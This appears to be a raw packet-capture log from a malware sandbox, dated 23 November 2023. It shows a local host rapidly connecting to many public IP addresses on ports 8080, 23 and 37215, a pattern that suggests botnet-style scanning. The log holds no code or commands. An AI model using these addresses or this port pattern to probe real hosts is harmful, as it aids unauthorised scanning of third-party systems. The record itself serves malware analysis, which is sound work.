                                              Nov 23, 2023 05:14:52.050190926 CET478168080192.168.2.1494.199.219.136
                                              Nov 23, 2023 05:14:52.050200939 CET478168080192.168.2.1494.112.245.192
                                              Nov 23, 2023 05:14:52.050208092 CET478168080192.168.2.1494.192.37.177
                                              Nov 23, 2023 05:14:52.050210953 CET478168080192.168.2.1485.228.149.186
                                              Nov 23, 2023 05:14:52.050219059 CET478168080192.168.2.1494.228.225.212
                                              Nov 23, 2023 05:14:52.050220966 CET478168080192.168.2.1462.44.222.101
                                              Nov 23, 2023 05:14:52.050235987 CET478168080192.168.2.1494.4.7.147
                                              Nov 23, 2023 05:14:52.050239086 CET478168080192.168.2.1431.240.254.174
                                              Nov 23, 2023 05:14:52.050250053 CET478168080192.168.2.1431.136.130.125
                                              Nov 23, 2023 05:14:52.050250053 CET478168080192.168.2.1485.34.136.124
                                              Nov 23, 2023 05:14:52.050250053 CET478168080192.168.2.1494.37.181.219
                                              Nov 23, 2023 05:14:52.050266981 CET478168080192.168.2.1494.88.209.93
                                              Nov 23, 2023 05:14:52.050272942 CET478168080192.168.2.1431.225.59.139
                                              Nov 23, 2023 05:14:52.050276995 CET478168080192.168.2.1485.215.232.62
                                              Nov 23, 2023 05:14:52.050283909 CET478168080192.168.2.1494.103.240.2
                                              Nov 23, 2023 05:14:52.050293922 CET478168080192.168.2.1431.181.176.255
                                              Nov 23, 2023 05:14:52.050293922 CET478168080192.168.2.1485.92.252.135
                                              Nov 23, 2023 05:14:52.050304890 CET478168080192.168.2.1431.91.17.146
                                              Nov 23, 2023 05:14:52.050311089 CET478168080192.168.2.1431.233.97.4
                                              Nov 23, 2023 05:14:52.050319910 CET478168080192.168.2.1485.97.63.207
                                              Nov 23, 2023 05:14:52.050322056 CET478168080192.168.2.1462.78.168.138
                                              Nov 23, 2023 05:14:52.050334930 CET478168080192.168.2.1462.82.138.54
                                              Nov 23, 2023 05:14:52.050337076 CET478168080192.168.2.1462.93.241.70
                                              Nov 23, 2023 05:14:52.050338030 CET478168080192.168.2.1462.37.227.8
                                              Nov 23, 2023 05:14:52.050348997 CET478168080192.168.2.1431.7.199.122
                                              Nov 23, 2023 05:14:52.050349951 CET478168080192.168.2.1495.236.114.63
                                              Nov 23, 2023 05:14:52.050360918 CET478168080192.168.2.1494.92.85.97
                                              Nov 23, 2023 05:14:52.050365925 CET478168080192.168.2.1462.13.127.198
                                              Nov 23, 2023 05:14:52.050365925 CET478168080192.168.2.1462.84.140.76
                                              Nov 23, 2023 05:14:52.050376892 CET478168080192.168.2.1495.63.80.32
                                              Nov 23, 2023 05:14:52.050379038 CET478168080192.168.2.1431.125.31.6
                                              Nov 23, 2023 05:14:52.050385952 CET478168080192.168.2.1431.20.134.144
                                              Nov 23, 2023 05:14:52.050386906 CET478168080192.168.2.1431.2.193.34
                                              Nov 23, 2023 05:14:52.050388098 CET478168080192.168.2.1462.152.142.97
                                              Nov 23, 2023 05:14:52.050388098 CET478168080192.168.2.1495.187.155.74
                                              Nov 23, 2023 05:14:52.050391912 CET478168080192.168.2.1462.191.224.237
                                              Nov 23, 2023 05:14:52.050405025 CET478168080192.168.2.1485.62.244.221
                                              Nov 23, 2023 05:14:52.050406933 CET478168080192.168.2.1431.183.190.106
                                              Nov 23, 2023 05:14:52.050420046 CET478168080192.168.2.1494.244.222.141
                                              Nov 23, 2023 05:14:52.050429106 CET478168080192.168.2.1462.179.60.241
                                              Nov 23, 2023 05:14:52.050436974 CET478168080192.168.2.1431.170.25.97
                                              Nov 23, 2023 05:14:52.050436974 CET478168080192.168.2.1462.214.1.223
                                              Nov 23, 2023 05:14:52.050442934 CET478168080192.168.2.1462.248.206.88
                                              Nov 23, 2023 05:14:52.050442934 CET478168080192.168.2.1431.160.39.246
                                              Nov 23, 2023 05:14:52.050443888 CET478168080192.168.2.1431.119.42.194
                                              Nov 23, 2023 05:14:52.050461054 CET478168080192.168.2.1485.227.32.195
                                              Nov 23, 2023 05:14:52.050462961 CET478168080192.168.2.1495.49.2.9
                                              Nov 23, 2023 05:14:52.050472021 CET478168080192.168.2.1462.183.14.4
                                              Nov 23, 2023 05:14:52.050473928 CET478168080192.168.2.1462.128.63.162
                                              Nov 23, 2023 05:14:52.050477028 CET478168080192.168.2.1494.225.230.116
                                              Nov 23, 2023 05:14:52.050482035 CET478168080192.168.2.1431.75.172.157
                                              Nov 23, 2023 05:14:52.050482035 CET478168080192.168.2.1495.186.26.204
                                              Nov 23, 2023 05:14:52.050488949 CET478168080192.168.2.1495.219.224.51
                                              Nov 23, 2023 05:14:52.050501108 CET478168080192.168.2.1495.251.109.62
                                              Nov 23, 2023 05:14:52.050503969 CET478168080192.168.2.1462.203.65.43
                                              Nov 23, 2023 05:14:52.050512075 CET478168080192.168.2.1462.201.156.235
                                              Nov 23, 2023 05:14:52.050512075 CET478168080192.168.2.1462.105.10.150
                                              Nov 23, 2023 05:14:52.050517082 CET478168080192.168.2.1485.166.189.188
                                              Nov 23, 2023 05:14:52.050527096 CET478168080192.168.2.1485.66.227.152
                                              Nov 23, 2023 05:14:52.050535917 CET478168080192.168.2.1431.102.157.180
                                              Nov 23, 2023 05:14:52.050537109 CET478168080192.168.2.1431.228.32.76
                                              Nov 23, 2023 05:14:52.050545931 CET478168080192.168.2.1462.150.5.82
                                              Nov 23, 2023 05:14:52.050554037 CET478168080192.168.2.1494.108.247.8
                                              Nov 23, 2023 05:14:52.050565004 CET478168080192.168.2.1462.121.238.58
                                              Nov 23, 2023 05:14:52.050569057 CET478168080192.168.2.1431.75.5.231
                                              Nov 23, 2023 05:14:52.050578117 CET478168080192.168.2.1494.216.216.85
                                              Nov 23, 2023 05:14:52.050578117 CET478168080192.168.2.1485.75.174.28
                                              Nov 23, 2023 05:14:52.050579071 CET478168080192.168.2.1494.104.247.209
                                              Nov 23, 2023 05:14:52.050587893 CET478168080192.168.2.1485.49.169.219
                                              Nov 23, 2023 05:14:52.050591946 CET478168080192.168.2.1431.125.18.5
                                              Nov 23, 2023 05:14:52.050601006 CET478168080192.168.2.1485.37.52.66
                                              Nov 23, 2023 05:14:52.050606012 CET478168080192.168.2.1431.73.138.117
                                              Nov 23, 2023 05:14:52.050606966 CET478168080192.168.2.1431.68.235.39
                                              Nov 23, 2023 05:14:52.050611019 CET478168080192.168.2.1462.175.162.100
                                              Nov 23, 2023 05:14:52.050626040 CET478168080192.168.2.1495.215.111.154
                                              Nov 23, 2023 05:14:52.050637960 CET478168080192.168.2.1485.187.127.86
                                              Nov 23, 2023 05:14:52.050637960 CET478168080192.168.2.1494.2.106.43
                                              Nov 23, 2023 05:14:52.050637960 CET478168080192.168.2.1462.32.4.56
                                              Nov 23, 2023 05:14:52.050646067 CET478168080192.168.2.1495.139.213.155
                                              Nov 23, 2023 05:14:52.050653934 CET478168080192.168.2.1485.56.36.93
                                              Nov 23, 2023 05:14:52.050654888 CET478168080192.168.2.1462.163.181.59
                                              Nov 23, 2023 05:14:52.050659895 CET478168080192.168.2.1495.239.61.250
                                              Nov 23, 2023 05:14:52.050676107 CET478168080192.168.2.1462.180.253.244
                                              Nov 23, 2023 05:14:52.050677061 CET478168080192.168.2.1485.123.93.174
                                              Nov 23, 2023 05:14:52.050678968 CET478168080192.168.2.1431.31.24.54
                                              Nov 23, 2023 05:14:52.050681114 CET478168080192.168.2.1485.41.68.68
                                              Nov 23, 2023 05:14:52.050683022 CET478168080192.168.2.1495.247.17.76
                                              Nov 23, 2023 05:14:52.050687075 CET478168080192.168.2.1431.230.232.78
                                              Nov 23, 2023 05:14:52.050688982 CET478168080192.168.2.1494.46.227.205
                                              Nov 23, 2023 05:14:52.050700903 CET478168080192.168.2.1495.55.31.197
                                              Nov 23, 2023 05:14:52.050700903 CET478168080192.168.2.1462.217.239.81
                                              Nov 23, 2023 05:14:52.050715923 CET478168080192.168.2.1495.136.38.151
                                              Nov 23, 2023 05:14:52.050717115 CET478168080192.168.2.1494.240.252.2
                                              Nov 23, 2023 05:14:52.050717115 CET478168080192.168.2.1494.57.176.185
                                              Nov 23, 2023 05:14:52.050728083 CET478168080192.168.2.1485.75.86.255
                                              Nov 23, 2023 05:14:52.050730944 CET478168080192.168.2.1485.174.150.140
                                              Nov 23, 2023 05:14:52.050740957 CET478168080192.168.2.1494.115.183.29
                                              Nov 23, 2023 05:14:52.050745964 CET478168080192.168.2.1494.244.48.18
                                              Nov 23, 2023 05:14:52.050750017 CET478168080192.168.2.1431.33.30.80
                                              Nov 23, 2023 05:14:52.050766945 CET478168080192.168.2.1462.159.92.112
                                              Nov 23, 2023 05:14:52.050767899 CET478168080192.168.2.1495.87.172.139
                                              Nov 23, 2023 05:14:52.050767899 CET478168080192.168.2.1485.214.94.222
                                              Nov 23, 2023 05:14:52.050787926 CET478168080192.168.2.1485.139.142.247
                                              Nov 23, 2023 05:14:52.050787926 CET478168080192.168.2.1462.98.215.197
                                              Nov 23, 2023 05:14:52.050793886 CET478168080192.168.2.1431.5.224.2
                                              Nov 23, 2023 05:14:52.050795078 CET478168080192.168.2.1431.142.121.203
                                              Nov 23, 2023 05:14:52.050805092 CET478168080192.168.2.1494.164.199.79
                                              Nov 23, 2023 05:14:52.050807953 CET478168080192.168.2.1485.135.3.212
                                              Nov 23, 2023 05:14:52.050811052 CET478168080192.168.2.1462.223.191.200
                                              Nov 23, 2023 05:14:52.050829887 CET478168080192.168.2.1494.161.37.37
                                              Nov 23, 2023 05:14:52.050829887 CET478168080192.168.2.1495.115.34.43
                                              Nov 23, 2023 05:14:52.050841093 CET478168080192.168.2.1495.77.93.203
                                              Nov 23, 2023 05:14:52.050842047 CET478168080192.168.2.1431.192.13.117
                                              Nov 23, 2023 05:14:52.050851107 CET478168080192.168.2.1494.201.196.242
                                              Nov 23, 2023 05:14:52.050863028 CET478168080192.168.2.1495.98.16.219
                                              Nov 23, 2023 05:14:52.050867081 CET478168080192.168.2.1462.225.108.107
                                              Nov 23, 2023 05:14:52.050877094 CET478168080192.168.2.1462.213.194.229
                                              Nov 23, 2023 05:14:52.050879955 CET478168080192.168.2.1494.27.112.64
                                              Nov 23, 2023 05:14:52.050887108 CET478168080192.168.2.1462.21.221.211
                                              Nov 23, 2023 05:14:52.050887108 CET478168080192.168.2.1495.31.143.75
                                              Nov 23, 2023 05:14:52.050888062 CET478168080192.168.2.1494.155.96.56
                                              Nov 23, 2023 05:14:52.050890923 CET478168080192.168.2.1495.146.10.45
                                              Nov 23, 2023 05:14:52.050898075 CET478168080192.168.2.1431.17.151.212
                                              Nov 23, 2023 05:14:52.050903082 CET478168080192.168.2.1462.13.37.194
                                              Nov 23, 2023 05:14:52.050909042 CET478168080192.168.2.1485.222.142.134
                                              Nov 23, 2023 05:14:52.050918102 CET478168080192.168.2.1495.240.107.188
                                              Nov 23, 2023 05:14:52.050930023 CET478168080192.168.2.1495.97.182.83
                                              Nov 23, 2023 05:14:52.050930023 CET478168080192.168.2.1485.104.23.151
                                              Nov 23, 2023 05:14:52.050941944 CET478168080192.168.2.1494.2.185.191
                                              Nov 23, 2023 05:14:52.050944090 CET478168080192.168.2.1494.43.121.10
                                              Nov 23, 2023 05:14:52.050960064 CET478168080192.168.2.1431.175.224.187
                                              Nov 23, 2023 05:14:52.050962925 CET478168080192.168.2.1462.49.198.126
                                              Nov 23, 2023 05:14:52.050978899 CET478168080192.168.2.1462.172.222.171
                                              Nov 23, 2023 05:14:52.050981998 CET478168080192.168.2.1431.181.82.170
                                              Nov 23, 2023 05:14:52.050981998 CET478168080192.168.2.1485.188.211.13
                                              Nov 23, 2023 05:14:52.050982952 CET478168080192.168.2.1495.45.236.249
                                              Nov 23, 2023 05:14:52.050981998 CET478168080192.168.2.1462.89.51.130
                                              Nov 23, 2023 05:14:52.050995111 CET478168080192.168.2.1485.237.152.52
                                              Nov 23, 2023 05:14:52.051002979 CET478168080192.168.2.1494.206.136.6
                                              Nov 23, 2023 05:14:52.051012993 CET478168080192.168.2.1485.207.176.170
                                              Nov 23, 2023 05:14:52.051014900 CET478168080192.168.2.1494.101.227.209
                                              Nov 23, 2023 05:14:52.051018000 CET478168080192.168.2.1495.24.129.212
                                              Nov 23, 2023 05:14:52.051023006 CET478168080192.168.2.1495.201.204.242
                                              Nov 23, 2023 05:14:52.051043034 CET478168080192.168.2.1494.214.175.23
                                              Nov 23, 2023 05:14:52.051043034 CET478168080192.168.2.1462.195.98.204
                                              Nov 23, 2023 05:14:52.051052094 CET478168080192.168.2.1431.247.92.59
                                              Nov 23, 2023 05:14:52.051064014 CET478168080192.168.2.1431.197.156.8
                                              Nov 23, 2023 05:14:52.051064014 CET478168080192.168.2.1495.50.50.161
                                              Nov 23, 2023 05:14:52.051064014 CET478168080192.168.2.1495.36.56.252
                                              Nov 23, 2023 05:14:52.051070929 CET478168080192.168.2.1462.239.95.171
                                              Nov 23, 2023 05:14:52.051070929 CET478168080192.168.2.1495.109.138.167
                                              Nov 23, 2023 05:14:52.051074982 CET478168080192.168.2.1495.64.193.34
                                              Nov 23, 2023 05:14:52.051074982 CET478168080192.168.2.1495.7.14.238
                                              Nov 23, 2023 05:14:52.051075935 CET478168080192.168.2.1485.154.122.56
                                              Nov 23, 2023 05:14:52.051075935 CET478168080192.168.2.1485.86.197.166
                                              Nov 23, 2023 05:14:52.051078081 CET478168080192.168.2.1485.152.115.89
                                              Nov 23, 2023 05:14:52.051090002 CET478168080192.168.2.1485.60.188.196
                                              Nov 23, 2023 05:14:52.051098108 CET478168080192.168.2.1462.128.4.173
                                              Nov 23, 2023 05:14:52.051098108 CET478168080192.168.2.1485.139.1.4
                                              Nov 23, 2023 05:14:52.051111937 CET478168080192.168.2.1495.106.125.202
                                              Nov 23, 2023 05:14:52.051111937 CET478168080192.168.2.1495.66.69.222
                                              Nov 23, 2023 05:14:52.051115036 CET478168080192.168.2.1485.101.60.4
                                              Nov 23, 2023 05:14:52.051120996 CET478168080192.168.2.1485.120.10.68
                                              Nov 23, 2023 05:14:52.051132917 CET478168080192.168.2.1431.200.129.41
                                              Nov 23, 2023 05:14:52.051136017 CET478168080192.168.2.1431.168.102.86
                                              Nov 23, 2023 05:14:52.051141024 CET478168080192.168.2.1485.44.170.27
                                              Nov 23, 2023 05:14:52.051143885 CET478168080192.168.2.1462.79.199.54
                                              Nov 23, 2023 05:14:52.051147938 CET478168080192.168.2.1485.1.141.81
                                              Nov 23, 2023 05:14:52.051152945 CET478168080192.168.2.1431.122.239.41
                                              Nov 23, 2023 05:14:52.051165104 CET478168080192.168.2.1431.33.240.56
                                              Nov 23, 2023 05:14:52.051167011 CET478168080192.168.2.1431.3.205.18
                                              Nov 23, 2023 05:14:52.051171064 CET478168080192.168.2.1462.214.204.157
                                              Nov 23, 2023 05:14:52.051229954 CET389148080192.168.2.1462.163.178.247
                                              Nov 23, 2023 05:14:52.051255941 CET457028080192.168.2.1485.23.227.71
                                              Nov 23, 2023 05:14:52.064723015 CET234566095.181.105.1192.168.2.14
                                              Nov 23, 2023 05:14:52.064815044 CET4566023192.168.2.1495.181.105.1
                                              Nov 23, 2023 05:14:52.065063953 CET234566095.181.105.1192.168.2.14
                                              Nov 23, 2023 05:14:52.065129995 CET4566023192.168.2.1495.181.105.1
                                              Nov 23, 2023 05:14:52.065181017 CET4567023192.168.2.1495.181.105.1
                                              Nov 23, 2023 05:14:52.073538065 CET539768080192.168.2.1462.94.214.12
                                              Nov 23, 2023 05:14:52.073544025 CET327728080192.168.2.1431.136.62.2
                                              Nov 23, 2023 05:14:52.137552977 CET5955437215192.168.2.1441.78.156.233
                                              Nov 23, 2023 05:14:52.148597956 CET80804781685.153.73.39192.168.2.14
                                              Nov 23, 2023 05:14:52.208637953 CET3721544226156.235.103.206192.168.2.14
                                              Nov 23, 2023 05:14:52.208817005 CET4422637215192.168.2.14156.235.103.206
                                              Nov 23, 2023 05:14:52.208909035 CET4422637215192.168.2.14156.235.103.206
                                              Nov 23, 2023 05:14:52.208923101 CET4422637215192.168.2.14156.235.103.206
                                              Nov 23, 2023 05:14:52.208978891 CET4425837215192.168.2.14156.235.103.206
                                              Nov 23, 2023 05:14:52.222863913 CET80804781662.24.206.110192.168.2.14
                                              Nov 23, 2023 05:14:52.235821962 CET80804781694.104.247.209192.168.2.14
                                              Nov 23, 2023 05:14:52.239393950 CET80804781631.136.130.125192.168.2.14
                                              Nov 23, 2023 05:14:52.239444017 CET478168080192.168.2.1431.136.130.125
                                              Nov 23, 2023 05:14:52.239690065 CET80804781685.22.63.143192.168.2.14
                                              Nov 23, 2023 05:14:52.239727974 CET478168080192.168.2.1485.22.63.143
                                              Nov 23, 2023 05:14:52.243299961 CET80804781631.32.60.245192.168.2.14
                                              Nov 23, 2023 05:14:52.245070934 CET80804781685.49.136.1192.168.2.14
                                              Nov 23, 2023 05:14:52.254259109 CET235100895.9.134.44192.168.2.14
                                              Nov 23, 2023 05:14:52.254301071 CET5100823192.168.2.1495.9.134.44
                                              Nov 23, 2023 05:14:52.258629084 CET80803277231.136.62.2192.168.2.14
                                              Nov 23, 2023 05:14:52.258760929 CET327728080192.168.2.1431.136.62.2
                                              Nov 23, 2023 05:14:52.258774042 CET80804781695.140.116.42192.168.2.14
                                              Nov 23, 2023 05:14:52.258902073 CET525488080192.168.2.1431.136.130.125
                                              Nov 23, 2023 05:14:52.258919001 CET474908080192.168.2.1485.22.63.143
                                              Nov 23, 2023 05:14:52.258985996 CET327728080192.168.2.1431.136.62.2
                                              Nov 23, 2023 05:14:52.259018898 CET327728080192.168.2.1431.136.62.2
                                              Nov 23, 2023 05:14:52.259080887 CET328028080192.168.2.1431.136.62.2
                                              Nov 23, 2023 05:14:52.259882927 CET80804781685.122.216.212192.168.2.14
                                              Nov 23, 2023 05:14:52.259928942 CET478168080192.168.2.1485.122.216.212
                                              Nov 23, 2023 05:14:52.261286020 CET80803891462.163.178.247192.168.2.14
                                              Nov 23, 2023 05:14:52.261363029 CET389148080192.168.2.1462.163.178.247
                                              Nov 23, 2023 05:14:52.261384964 CET586748080192.168.2.1485.122.216.212
                                              Nov 23, 2023 05:14:52.261421919 CET389148080192.168.2.1462.163.178.247
                                              Nov 23, 2023 05:14:52.261436939 CET389308080192.168.2.1462.163.178.247
                                              Nov 23, 2023 05:14:52.261445999 CET389148080192.168.2.1462.163.178.247
                                              Nov 23, 2023 05:14:52.261954069 CET80804781694.154.254.160192.168.2.14
                                              Nov 23, 2023 05:14:52.264736891 CET80804781695.197.201.123192.168.2.14
                                              Nov 23, 2023 05:14:52.273989916 CET80805397662.94.214.12192.168.2.14
                                              Nov 23, 2023 05:14:52.274049997 CET539768080192.168.2.1462.94.214.12
                                              Nov 23, 2023 05:14:52.274080992 CET539768080192.168.2.1462.94.214.12
                                              Nov 23, 2023 05:14:52.274080992 CET539768080192.168.2.1462.94.214.12
                                              Nov 23, 2023 05:14:52.274096966 CET540108080192.168.2.1462.94.214.12
                                              Nov 23, 2023 05:14:52.277092934 CET80804570285.23.227.71192.168.2.14
                                              Nov 23, 2023 05:14:52.277133942 CET457028080192.168.2.1485.23.227.71
                                              Nov 23, 2023 05:14:52.277149916 CET457028080192.168.2.1485.23.227.71
                                              Nov 23, 2023 05:14:52.277160883 CET457028080192.168.2.1485.23.227.71
                                              Nov 23, 2023 05:14:52.277177095 CET457208080192.168.2.1485.23.227.71
                                              Nov 23, 2023 05:14:52.279515982 CET80804781694.120.45.73192.168.2.14
                                              Nov 23, 2023 05:14:52.279557943 CET478168080192.168.2.1494.120.45.73
                                              Nov 23, 2023 05:14:52.299082041 CET80804781694.43.88.247192.168.2.14
                                              Nov 23, 2023 05:14:52.299530983 CET2358914201.179.200.71192.168.2.14
                                              Nov 23, 2023 05:14:52.299599886 CET5891423192.168.2.14201.179.200.71
                                              Nov 23, 2023 05:14:52.299649000 CET5891423192.168.2.14201.179.200.71
                                              Nov 23, 2023 05:14:52.315289974 CET80804781695.58.242.148192.168.2.14
                                              Nov 23, 2023 05:14:52.329528093 CET3566637215192.168.2.14156.254.88.148
                                              Nov 23, 2023 05:14:52.329535961 CET4240037215192.168.2.14156.226.15.209
                                              Nov 23, 2023 05:14:52.329977989 CET234567095.181.105.1192.168.2.14
                                              Nov 23, 2023 05:14:52.330040932 CET4567023192.168.2.1495.181.105.1
                                              Nov 23, 2023 05:14:52.331593990 CET234566095.181.105.1192.168.2.14
                                              Nov 23, 2023 05:14:52.375077009 CET3721544258156.235.103.206192.168.2.14
                                              Nov 23, 2023 05:14:52.375247002 CET4425837215192.168.2.14156.235.103.206
                                              Nov 23, 2023 05:14:52.375397921 CET4425837215192.168.2.14156.235.103.206
                                              Nov 23, 2023 05:14:52.375437021 CET4783037215192.168.2.14197.204.164.32
                                              Nov 23, 2023 05:14:52.375439882 CET4783037215192.168.2.14156.3.43.58
                                              Nov 23, 2023 05:14:52.375457048 CET4783037215192.168.2.14156.13.59.39
                                              Nov 23, 2023 05:14:52.375468969 CET4783037215192.168.2.14156.128.183.83
                                              Nov 23, 2023 05:14:52.375475883 CET4783037215192.168.2.14156.158.68.119
                                              Nov 23, 2023 05:14:52.375487089 CET4783037215192.168.2.1441.191.79.147
                                              Nov 23, 2023 05:14:52.375499964 CET4783037215192.168.2.14156.140.70.63
                                              Nov 23, 2023 05:14:52.375514984 CET4783037215192.168.2.14197.178.133.73
                                              Nov 23, 2023 05:14:52.375528097 CET4783037215192.168.2.14156.50.176.7
                                              Nov 23, 2023 05:14:52.375530005 CET4783037215192.168.2.1441.99.86.90
                                              Nov 23, 2023 05:14:52.375541925 CET4783037215192.168.2.14156.37.75.43
                                              Nov 23, 2023 05:14:52.375556946 CET4783037215192.168.2.14197.176.86.129
                                              Nov 23, 2023 05:14:52.375570059 CET4783037215192.168.2.14197.93.0.112
                                              Nov 23, 2023 05:14:52.375574112 CET4783037215192.168.2.1441.192.8.174
                                              Nov 23, 2023 05:14:52.375587940 CET4783037215192.168.2.14197.48.170.115
                                              Nov 23, 2023 05:14:52.375611067 CET4783037215192.168.2.1441.63.93.24
                                              Nov 23, 2023 05:14:52.375611067 CET4783037215192.168.2.1441.136.206.246
                                              Nov 23, 2023 05:14:52.375613928 CET4783037215192.168.2.14156.78.51.87
                                              Nov 23, 2023 05:14:52.375621080 CET4783037215192.168.2.14156.12.220.38
                                              Nov 23, 2023 05:14:52.375627995 CET4783037215192.168.2.1441.8.212.169
                                              Nov 23, 2023 05:14:52.375642061 CET4783037215192.168.2.14197.229.199.14
                                              Nov 23, 2023 05:14:52.375643969 CET4783037215192.168.2.14156.22.129.13
                                              Nov 23, 2023 05:14:52.375655890 CET4783037215192.168.2.14156.191.78.93
                                              Nov 23, 2023 05:14:52.375663996 CET4783037215192.168.2.14156.13.82.171
                                              Nov 23, 2023 05:14:52.375669003 CET4783037215192.168.2.14156.70.182.102
                                              Nov 23, 2023 05:14:52.375679970 CET4783037215192.168.2.14197.151.103.246
                                              Nov 23, 2023 05:14:52.375694036 CET4783037215192.168.2.14156.62.162.79
                                              Nov 23, 2023 05:14:52.375699043 CET4783037215192.168.2.14156.123.78.216
                                              Nov 23, 2023 05:14:52.375715017 CET4783037215192.168.2.14156.166.242.15
                                              Nov 23, 2023 05:14:52.375721931 CET4783037215192.168.2.1441.75.81.114
                                              Nov 23, 2023 05:14:52.375732899 CET4783037215192.168.2.14156.212.91.12
                                              Nov 23, 2023 05:14:52.375736952 CET4783037215192.168.2.1441.129.246.205
                                              Nov 23, 2023 05:14:52.375746012 CET4783037215192.168.2.14156.152.34.144
                                              Nov 23, 2023 05:14:52.375767946 CET4783037215192.168.2.14156.212.106.217
                                              Nov 23, 2023 05:14:52.375773907 CET4783037215192.168.2.1441.160.17.28
                                              Nov 23, 2023 05:14:52.375773907 CET4783037215192.168.2.1441.12.183.65
                                              Nov 23, 2023 05:14:52.375781059 CET4783037215192.168.2.14197.244.160.167
                                              Nov 23, 2023 05:14:52.375785112 CET4783037215192.168.2.14197.234.244.56
                                              Nov 23, 2023 05:14:52.375799894 CET4783037215192.168.2.14197.32.186.187
                                              Nov 23, 2023 05:14:52.375809908 CET4783037215192.168.2.14156.199.252.128
                                              Nov 23, 2023 05:14:52.375811100 CET4783037215192.168.2.14156.79.192.234
                                              Nov 23, 2023 05:14:52.375833988 CET4783037215192.168.2.14197.241.147.67
                                              Nov 23, 2023 05:14:52.375834942 CET4783037215192.168.2.1441.166.19.210
                                              Nov 23, 2023 05:14:52.375849009 CET4783037215192.168.2.14156.126.236.161
                                              Nov 23, 2023 05:14:52.375850916 CET4783037215192.168.2.1441.9.140.75
                                              Nov 23, 2023 05:14:52.375863075 CET4783037215192.168.2.14197.109.68.212
                                              Nov 23, 2023 05:14:52.375876904 CET4783037215192.168.2.14156.209.62.9
                                              Nov 23, 2023 05:14:52.375880003 CET4783037215192.168.2.1441.43.84.9
                                              Nov 23, 2023 05:14:52.375905037 CET4783037215192.168.2.14197.91.39.96
                                              Nov 23, 2023 05:14:52.375906944 CET4783037215192.168.2.1441.225.243.196
                                              Nov 23, 2023 05:14:52.375910044 CET4783037215192.168.2.14156.254.228.104
                                              Nov 23, 2023 05:14:52.375910044 CET4783037215192.168.2.14197.249.7.164
                                              Nov 23, 2023 05:14:52.375910044 CET4783037215192.168.2.1441.171.99.218
                                              Nov 23, 2023 05:14:52.375914097 CET4783037215192.168.2.14197.253.28.182
                                              Nov 23, 2023 05:14:52.375926018 CET4783037215192.168.2.1441.220.137.110
                                              Nov 23, 2023 05:14:52.375946045 CET4783037215192.168.2.14197.186.61.32
                                              Nov 23, 2023 05:14:52.375942945 CET4783037215192.168.2.1441.148.17.25
                                              Nov 23, 2023 05:14:52.375960112 CET4783037215192.168.2.14156.17.249.34
                                              Nov 23, 2023 05:14:52.375972986 CET4783037215192.168.2.14156.220.115.84
                                              Nov 23, 2023 05:14:52.375972986 CET4783037215192.168.2.14197.12.248.207
                                              Nov 23, 2023 05:14:52.375992060 CET4783037215192.168.2.1441.154.47.40
                                              Nov 23, 2023 05:14:52.376003027 CET4783037215192.168.2.14156.164.158.103
                                              Nov 23, 2023 05:14:52.376013041 CET4783037215192.168.2.14156.153.7.190
                                              Nov 23, 2023 05:14:52.376017094 CET4783037215192.168.2.14197.138.210.141
                                              Nov 23, 2023 05:14:52.376029968 CET4783037215192.168.2.14156.52.13.223
                                              Nov 23, 2023 05:14:52.376035929 CET4783037215192.168.2.14156.220.228.208
                                              Nov 23, 2023 05:14:52.376039028 CET4783037215192.168.2.1441.196.89.26
                                              Nov 23, 2023 05:14:52.376058102 CET4783037215192.168.2.1441.220.61.152
                                              Nov 23, 2023 05:14:52.376058102 CET4783037215192.168.2.14197.238.169.197
                                              Nov 23, 2023 05:14:52.376074076 CET4783037215192.168.2.14156.98.147.140
                                              Nov 23, 2023 05:14:52.376092911 CET4783037215192.168.2.1441.23.73.59
                                              Nov 23, 2023 05:14:52.376092911 CET4783037215192.168.2.1441.23.171.61
                                              Nov 23, 2023 05:14:52.376092911 CET4783037215192.168.2.1441.139.120.23
                                              Nov 23, 2023 05:14:52.376105070 CET4783037215192.168.2.1441.167.232.186
                                              Nov 23, 2023 05:14:52.376120090 CET4783037215192.168.2.14156.66.167.227
                                              Nov 23, 2023 05:14:52.376121998 CET4783037215192.168.2.1441.24.248.154
                                              Nov 23, 2023 05:14:52.376138926 CET4783037215192.168.2.14156.197.14.196
                                              Nov 23, 2023 05:14:52.376149893 CET4783037215192.168.2.14197.148.253.110
                                              Nov 23, 2023 05:14:52.376149893 CET4783037215192.168.2.14197.223.211.101
                                              Nov 23, 2023 05:14:52.376171112 CET4783037215192.168.2.14197.185.36.48
                                              Nov 23, 2023 05:14:52.376171112 CET4783037215192.168.2.14197.196.12.80
                                              Nov 23, 2023 05:14:52.376179934 CET4783037215192.168.2.14156.1.135.22
                                              Nov 23, 2023 05:14:52.376195908 CET4783037215192.168.2.14156.10.166.242
                                              Nov 23, 2023 05:14:52.376198053 CET4783037215192.168.2.14197.14.19.62
                                              Nov 23, 2023 05:14:52.376214027 CET4783037215192.168.2.14156.2.67.232
                                              Nov 23, 2023 05:14:52.376228094 CET4783037215192.168.2.14197.27.110.223
                                              Nov 23, 2023 05:14:52.376234055 CET4783037215192.168.2.14197.98.228.81
                                              Nov 23, 2023 05:14:52.376235008 CET4783037215192.168.2.14156.24.53.140
                                              Nov 23, 2023 05:14:52.376246929 CET4783037215192.168.2.14197.201.138.144
                                              Nov 23, 2023 05:14:52.376260996 CET4783037215192.168.2.1441.33.109.23
                                              Nov 23, 2023 05:14:52.376264095 CET4783037215192.168.2.14156.188.1.80
                                              Nov 23, 2023 05:14:52.376277924 CET4783037215192.168.2.14197.175.23.48
                                              Nov 23, 2023 05:14:52.376280069 CET4783037215192.168.2.14156.59.189.200
                                              Nov 23, 2023 05:14:52.376290083 CET4783037215192.168.2.14197.169.145.229
                                              Nov 23, 2023 05:14:52.376302004 CET4783037215192.168.2.14156.146.98.69
                                              Nov 23, 2023 05:14:52.376312017 CET4783037215192.168.2.14197.107.14.31
                                              Nov 23, 2023 05:14:52.376322031 CET4783037215192.168.2.14197.182.73.57
                                              Nov 23, 2023 05:14:52.376341105 CET4783037215192.168.2.1441.242.229.208
                                              Nov 23, 2023 05:14:52.376343012 CET4783037215192.168.2.14197.48.78.138
                                              Nov 23, 2023 05:14:52.376354933 CET4783037215192.168.2.14156.38.231.254
                                              Nov 23, 2023 05:14:52.376373053 CET4783037215192.168.2.1441.37.124.103
                                              Nov 23, 2023 05:14:52.376385927 CET4783037215192.168.2.14156.195.146.23
                                              Nov 23, 2023 05:14:52.376388073 CET4783037215192.168.2.14156.94.235.86
                                              Nov 23, 2023 05:14:52.376389027 CET4783037215192.168.2.14156.234.99.197
                                              Nov 23, 2023 05:14:52.376394987 CET4783037215192.168.2.14197.111.20.242
